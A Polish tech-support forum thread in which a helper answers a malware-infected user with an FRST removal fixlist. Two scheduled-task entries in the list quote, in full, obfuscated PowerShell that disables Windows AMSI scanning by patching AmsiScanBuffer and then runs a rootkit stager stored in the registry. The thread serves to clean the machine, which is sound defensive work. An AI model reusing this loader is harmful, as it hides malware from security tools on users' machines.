Elektroda.pl
Elektroda.pl
X

Search our partners

Find the latest content on electronic components. Datasheets.com
Elektroda.pl
Please add exception to AdBlock for elektroda.pl.
If you watch the ads, you support portal and users.

Błąd Themida file corrupted this program has been manipulated

Artur1233212 25 Sep 2021 12:13 213 1
  • #1
    Artur1233212
    Level 1  
    witam, gdy chce odpalić aplikacje wyskakuje mi taki błąd: themida file corrupted this program has been manipulated and maybe it`s infected by a Virus or cracked. This file won`t work anymore. nie mam pojęcia o co z tym chodzi bo pierwszy raz coś takiego mi wyskakuje, wcześniej gdy chciałem odpalić apliakacje coś takiego nie wyskakiwało. dołączam też pliki FRST i addition bo podobno są potrzebne.
  • Helpful post
    #2
    Kolobos
    IT specialist
    Wystarczy nie infekowac komputera i instalowac szkodliwych aplikacji.

    Sam zainstalowales radmina?

    Odinstaluj:
    ByteFence Anti-Malware
    CCleaner

    Zrob skan przy pomocy mbam oraz adwcleaner i usun to co wykryja.

    Wykonaj Fixlist.txt dla FRST:
    CloseProcesses:
    Hosts:
    () [Brak podpisu cyfrowego] C:\Users\Oskar\AppData\Roaming\windows apps.exe
    (Byte Technologies LLC -> Byte Technologies LLC.) C:\Program Files\ByteFence\rtop\bin\rtop_bg.exe
    (Byte Technologies LLC -> Byte Technologies LLC.) C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe
    HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706344 2021-06-09] (Oracle America, Inc. -> Oracle Corporation)
    HKU\S-1-5-21-2221780783-3129317606-1514258807-1001\...\Run: [Opera GX Browser Assistant] => C:\Users\Oskar\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe [3291288 2021-02-01] (Opera Software AS -> Opera Software)
    HKU\S-1-5-21-2221780783-3129317606-1514258807-1001\...\Run: [MP Launcher] => "D:\Games\scoped_dir10520_1000973119\MP Launcher.exe" /autostart
    HKU\S-1-5-21-2221780783-3129317606-1514258807-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [35093120 2021-09-10] (Piriform Software Ltd -> Piriform Software Ltd)
    HKLM\SOFTWARE\Policies\Mozilla\Firefox: Ograniczenia <==== UWAGA
    C:\Users\Oskar\AppData\Roaming\windows apps.exe
    Task: {48376B2C-EAA4-4F21-93CF-B3F830EA2375} - System32\Tasks\windows apps => C:\Users\Oskar\AppData\Roaming\windows apps.exe [369664 2021-08-15] () [Brak podpisu cyfrowego] <==== UWAGA
    Task: {7A1310F6-CB95-4D89-A06E-B43FA9DC0C82} - System32\Tasks\Opera GX scheduled assistant Autoupdate 1614787015 => C:\Users\Oskar\AppData\Local\Programs\Opera GX\launcher.exe [3845328 2021-09-23] (Opera Software AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\Oskar\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
    Task: {B04A4054-87B0-4B46-B5F5-5AD92738DB34} - System32\Tasks\$77svc64 => powershell "function Local:KyFNFEsxSJrE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EtMHXGJnFMocsg,[Parameter(Position=1)][Type]$AhNtnsKOFs)$ffPJKIloZoB=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$ffPJKIloZoB.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$EtMHXGJnFMocsg).SetImplementationFlags('Runtime,Managed');$ffPJKIloZoB.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$AhNtnsKOFs,$EtMHXGJnFMocsg).SetImplementationFlags('Runtime,Managed');Write-Output $ffPJKIloZoB.CreateType();}$crvljpmgbbpOV=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$mfqIfpPOOrGncE=$crvljpmgbbpOV.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WCDQGArWgFMPYHZmYcg=KyFNFEsxSJrE @([String])([IntPtr]);$YROCqDmgUlnUKXhslMnCDp=KyFNFEsxSJrE @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aJubzHSIege=$crvljpmgbbpOV.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$QWDxtBhiHPhDWr=$mfqIfpPOOrGncE.Invoke($Null,@([Object]$aJubzHSIege,[Object]('Load'+'LibraryA')));$OxkDxfRxoRiktrFds=$mfqIfpPOOrGncE.Invoke($Null,@([Object]$aJubzHSIege,[Object]('Vir'+'tual'+'Pro'+'tect')));$qVuIDTX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QWDxtBhiHPhDWr,$WCDQGArWgFMPYHZmYcg).Invoke('a'+'m'+'si.dll');$hsEaGXLVIoYJzzXye=$mfqIfpPOOrGncE.Invoke($Null,@([Object]$qVuIDTX,[Object]('Ams'+'iSc'+'an'+'Buffer')));$KWvxfJCuoy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OxkDxfRxoRiktrFds,$YROCqDmgUlnUKXhslMnCDp).Invoke($hsEaGXLVIoYJzzXye,[uint32]8,4,[ref]$KWvxfJCuoy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hsEaGXLVIoYJzzXye,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OxkDxfRxoRiktrFds,$YROCqDmgUlnUKXhslMnCDp).Invoke($hsEaGXLVIoYJzzXye,[uint32]8,0x20,[ref]$KWvxfJCuoy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
    C:\Users\Oskar\AppData\Roaming\handlerun.exe
    Task: {BCB9CD32-88C3-4D20-B7F4-01508839FE35} - System32\Tasks\OneDrive Application Manifest => C:\Users\Oskar\AppData\Roaming\handlerun.exe [45568 2021-09-07] () [Brak podpisu cyfrowego] <==== UWAGA
    Task: {BE205392-30E1-42FD-A744-BF2692DAAFBD} - System32\Tasks\$77svc32 => powershell "function Local:wVgCZJvwjKUp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$LILLfAcByIHBqw,[Parameter(Position=1)][Type]$cYrVsogYZO)$CmGBXzZlUYx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$CmGBXzZlUYx.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$LILLfAcByIHBqw).SetImplementationFlags('Runtime,Managed');$CmGBXzZlUYx.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$cYrVsogYZO,$LILLfAcByIHBqw).SetImplementationFlags('Runtime,Managed');Write-Output $CmGBXzZlUYx.CreateType();}$torNIkrKvJFxz=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$cEXsezwxAGqiet=$torNIkrKvJFxz.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$rMYqFdurgEpzxTvzrFR=wVgCZJvwjKUp @([String])([IntPtr]);$yGhYTzIOouUhUBxAwmXkxx=wVgCZJvwjKUp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$GfupWKNbEfG=$torNIkrKvJFxz.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$uQIKMUerQjYOGr=$cEXsezwxAGqiet.Invoke($Null,@([Object]$GfupWKNbEfG,[Object]('Load'+'LibraryA')));$MMteNQDzMZKzbjuha=$cEXsezwxAGqiet.Invoke($Null,@([Object]$GfupWKNbEfG,[Object]('Vir'+'tual'+'Pro'+'tect')));$OtsrHof=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uQIKMUerQjYOGr,$rMYqFdurgEpzxTvzrFR).Invoke('a'+'m'+'si.dll');$WDzvJVnOMohxsNTpd=$cEXsezwxAGqiet.Invoke($Null,@([Object]$OtsrHof,[Object]('Ams'+'iSc'+'an'+'Buffer')));$SfthMOtBqH=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MMteNQDzMZKzbjuha,$yGhYTzIOouUhUBxAwmXkxx).Invoke($WDzvJVnOMohxsNTpd,[uint32]8,4,[ref]$SfthMOtBqH);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$WDzvJVnOMohxsNTpd,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MMteNQDzMZKzbjuha,$yGhYTzIOouUhUBxAwmXkxx).Invoke($WDzvJVnOMohxsNTpd,[uint32]8,0x20,[ref]$SfthMOtBqH);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
    Task: {F1908776-0FE8-4F17-9F0E-C1E56F6EF1A3} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [684976 2021-09-10] (Piriform Software Ltd -> Piriform)
    Task: {F5BF4A22-905F-49AD-B58A-DDD99F1745C1} - System32\Tasks\www2 => C:\WINDOWS\system32\registryapp.exe
    C:\WINDOWS\system32\registryapp.exe
    Task: {FD2ACA18-7A1E-4C70-9782-8E970EAF23C8} - System32\Tasks\Opera GX scheduled Autoupdate 1582903675 => C:\Users\Oskar\AppData\Local\Programs\Opera GX\launcher.exe [3845328 2021-09-23] (Opera Software AS -> Opera Software)
    Edge HomeButtonPage: HKU\S-1-5-21-2221780783-3129317606-1514258807-1001 -> hxxp://www.global-pl.com/
    Edge HomePage: Default -> hxxp://www.global-pl.com/
    Edge StartupUrls: Default -> "hxxp://www.global-pl.com/"
    Edge DefaultSearchURL: Default -> hxxp://www.global-pl.com/search?q={searchTerms}
    Edge DefaultSearchKeyword: Default -> global-pl.com
    CHR HomePage: Default -> hxxp://www.global-pl.com/
    CHR StartupUrls: Default -> "hxxp://www.global-pl.com/"
    CHR DefaultSearchURL: Default -> hxxps://pl.search.yahoo.com/search?fr=mcafee_uninternational&type=E210PL91105G0&p={searchTerms}
    CHR DefaultSearchKeyword: Default -> mcafee
    C:\Users\Oskar\AppData\Local\Google\Chrome\User Data\Default\Extensions\blngdeeenccpfjbkolalandfmiinhkak
    C:\Users\Oskar\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho
    CHR Extension: (ByteFence Secure Browsing) - C:\Users\Oskar\AppData\Local\Google\Chrome\User Data\Default\Extensions\blngdeeenccpfjbkolalandfmiinhkak [2020-05-07]
    CHR Extension: (McAfee® WebAdvisor) - C:\Users\Oskar\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2021-05-27]
    R2 rtop; c:\program files\bytefence\rtop\bin\rtop_svc.exe [297288 2020-03-27] (Byte Technologies LLC -> Byte Technologies LLC.) <==== UWAGA
    S2 McAfee WebAdvisor; "C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe" [X]
    S3 OverwolfUpdater; "D:\Games\Overwolf\OverwolfUpdater.exe" /RunningFrom SCM [X]
    S3 Rockstar Service; "D:\steam\Launcher\RockstarService.exe" [X]
    c:\program files\bytefence\
    2021-09-25 02:51 - 2021-09-25 02:51 - 000003936 _____ C:\WINDOWS\system32\Tasks\CCleaner Update
    2021-09-25 02:51 - 2021-09-25 02:51 - 000000863 _____ C:\Users\Public\Desktop\CCleaner.lnk
    2021-09-25 02:51 - 2021-09-25 02:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
    2021-09-25 02:51 - 2021-09-25 02:51 - 000000000 ____D C:\Program Files\CCleaner
    2021-09-07 20:27 - 2021-09-07 20:27 - 000045568 _____ C:\Users\Oskar\AppData\Roaming\handlerun.exe
    2021-09-07 20:27 - 2021-09-07 20:27 - 000007168 _____ () C:\Users\Oskar\AppData\Roaming\handler.exe
    2021-09-07 20:27 - 2021-09-07 20:27 - 000003024 _____ C:\WINDOWS\system32\Tasks\OneDrive Application Manifest
    2021-08-27 02:51 - 2021-09-08 02:07 - 000318464 _____ C:\Users\Oskar\AppData\Roaming\Install.exe
    2021-08-27 02:51 - 2021-09-08 02:07 - 000296960 _____ (bytecode77) C:\Users\Oskar\AppData\Roaming\BytecodeApi.dll
    2021-08-27 02:51 - 2021-09-08 02:07 - 000140288 _____ C:\Users\Oskar\AppData\Roaming\r77-x64.dll
    2021-08-27 02:51 - 2021-09-08 02:07 - 000112640 _____ C:\Users\Oskar\AppData\Roaming\r77-x86.dll
    2021-08-27 02:51 - 2021-09-08 02:07 - 000077312 _____ (bytecode77) C:\Users\Oskar\AppData\Roaming\BytecodeApi.UI.dll
    2021-08-27 02:51 - 2021-09-07 20:27 - 008276480 _____ C:\Users\Oskar\AppData\Roaming\localapp.exe
    2021-08-27 02:51 - 2021-08-27 02:51 - 000046080 _____ C:\Users\Oskar\AppData\Roaming\registryapp.exe
    2021-08-27 02:51 - 2021-08-27 02:51 - 000003290 _____ C:\WINDOWS\system32\Tasks\www2
    2021-06-06 02:59 - 2021-07-08 08:22 - 000000032 _____ () C:\Users\Oskar\AppData\Roaming\.machineId
    2021-08-27 02:51 - 2021-09-08 02:07 - 000296960 _____ (bytecode77) C:\Users\Oskar\AppData\Roaming\BytecodeApi.dll
    2021-08-27 02:51 - 2021-09-08 02:07 - 000077312 _____ (bytecode77) C:\Users\Oskar\AppData\Roaming\BytecodeApi.UI.dll
    2021-09-07 20:27 - 2021-09-07 20:27 - 000007168 _____ () C:\Users\Oskar\AppData\Roaming\handler.exe
    2021-09-07 20:27 - 2021-09-07 20:27 - 000045568 _____ () C:\Users\Oskar\AppData\Roaming\handlerun.exe
    2021-08-27 02:51 - 2021-09-08 02:07 - 000318464 _____ () C:\Users\Oskar\AppData\Roaming\Install.exe
    2021-08-27 02:51 - 2021-09-07 20:27 - 008276480 _____ () C:\Users\Oskar\AppData\Roaming\localapp.exe
    2021-09-07 20:27 - 2021-09-08 02:07 - 000002920 _____ () C:\Users\Oskar\AppData\Roaming\OneDrive.xml
    2021-08-27 02:51 - 2021-09-08 02:07 - 000140288 _____ () C:\Users\Oskar\AppData\Roaming\r77-x64.dll
    2021-08-27 02:51 - 2021-09-08 02:07 - 000112640 _____ () C:\Users\Oskar\AppData\Roaming\r77-x86.dll
    2021-08-27 02:51 - 2021-08-27 02:51 - 000046080 _____ () C:\Users\Oskar\AppData\Roaming\registryapp.exe
    2021-08-15 19:31 - 2021-08-15 19:31 - 000046080 _____ () C:\Users\Oskar\AppData\Roaming\shifter.exe
    2019-09-15 15:07 - 2020-06-20 00:16 - 000000039 _____ () C:\Users\Oskar\AppData\Roaming\WB.CFG
    2021-08-15 19:31 - 2021-08-15 19:31 - 000369664 _____ () C:\Users\Oskar\AppData\Roaming\windows apps.exe